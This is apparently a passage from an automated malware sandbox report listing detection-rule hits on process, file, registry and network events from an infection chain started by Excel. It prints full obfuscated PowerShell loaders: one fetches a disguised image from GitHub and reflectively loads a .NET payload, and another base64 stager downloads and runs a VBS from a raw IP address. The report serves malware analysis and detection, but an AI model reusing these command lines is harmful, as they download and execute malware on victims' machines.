NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . 
((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , ProcessId: 3860, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", CommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; 
IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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
                  Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3184, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3456, ProcessName: mshta.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, ProcessId: 3668, ProcessName: powershell.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , ProcessId: 3860, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", ProcessId: 3760, ProcessName: csc.exe
                  Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 150.136.81.248, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3184, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS
                  Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 1884, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi", ProcessId: 1052, ProcessName: RegAsm.exe
                  Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3184, Protocol: tcp, SourceIp: 150.136.81.248, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . 
((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICA
gICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , ProcessId: 3860, ProcessName: wscript.exe
                  Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3184, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", CommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; 
IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . 
((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = 